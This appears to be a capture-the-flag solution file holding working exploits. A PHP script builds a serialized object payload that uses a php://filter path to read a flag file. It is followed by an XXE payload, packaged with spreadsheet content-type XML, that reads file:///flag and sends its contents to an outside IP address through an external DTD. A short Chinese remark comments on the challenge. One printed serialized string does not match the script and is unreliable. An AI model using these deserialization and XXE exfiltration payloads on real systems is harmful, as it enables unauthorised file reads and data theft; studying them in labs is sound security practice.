<?php
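/**
 * Local stand-in for a FileHandler class, used only to produce a serialized
 * object string with chosen property values.
 *
 * The serialized state comes entirely from the property defaults declared
 * below. unserialize() does not call __construct() when it rebuilds an
 * object, so a constructor in the receiving application cannot be relied on
 * to reset or validate these fields.
 *
 * NOTE(review): the receiving class's process() is not shown in this file;
 * presumably it acts on $op, $filename and $content. Confirm against the
 * real class. On the defending side, avoid unserialize() on request data
 * (json_decode(), or unserialize() with the allowed_classes option) and
 * check the scheme and location of any path taken from a deserialized
 * object before opening it.
 */
class FileHandler
{
    /** @var int Serialized as the integer 2 (i:2), not the string "2". */
    public $op = 2;

    /** @var string A php://filter stream-wrapper URL rather than a plain file path. */
    public $filename = 'php://filter/read=convert/base64-encode/resource=/web/html/flag.php';

    /** @var string Filler value. */
    public $content = 'aaa';

    /**
     * Intentionally empty.
     *
     * The previous body assigned "2", "/tmp/tmpfile" and "Hello World!" to
     * function-local variables ($op rather than $this->op), so it never
     * modified the object. Those dead assignments are dropped; the
     * serialized output is unchanged.
     */
    public function __construct()
    {
    }

    /**
     * Empty placeholder that keeps the class shape; returns null.
     */
    public function process()
    {
    }
}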
// Serialize one FileHandler and print its length followed by the string itself.
$a = new FileHandler();
$b = serialize($a);
echo strlen($b), "\n", $b, "\n";

// '\00*\00' is single-quoted, so it is the literal seven characters \00*\00,
// not NUL bytes. With every property declared public the serialized string
// holds no '*', so this replacement leaves the text unchanged and $c === $b.
$c = str_replace('*', '\00*\00', $b);
echo strlen($c), "\n", $c, "\n";

// URL-encoded forms of both strings; no newline after the last one.
echo urlencode($b), "\n", urlencode($c);
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:67:"php://filter/read=convert/base64-encode/resource=/web/html/flag.php";s:7:"content";s:3:"aaa";}
O:11:"FileHandler":3:{s:5:"/00*/00op";i:2;s:11:"/00*/00filename";s:57:"php://filter/read=convert/base64-encode/resource=flag.php";s:10:"/00*/00content";s:3:"aaa";
这道题好像中途改过。修改之后不用读绝对路径也可以,题目很简单;修改之前需要读取绝对路径,就有点困难了,因为这种情况很少遇见。
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % remote SYSTEM "http://116.62.211.134:2333/evil.dtd">
%remote;
%all;
]>
<root>&send;</root>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/><Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/><Override PartName="/xl/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/xl/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://116.62.211.134:2333/%file;'>">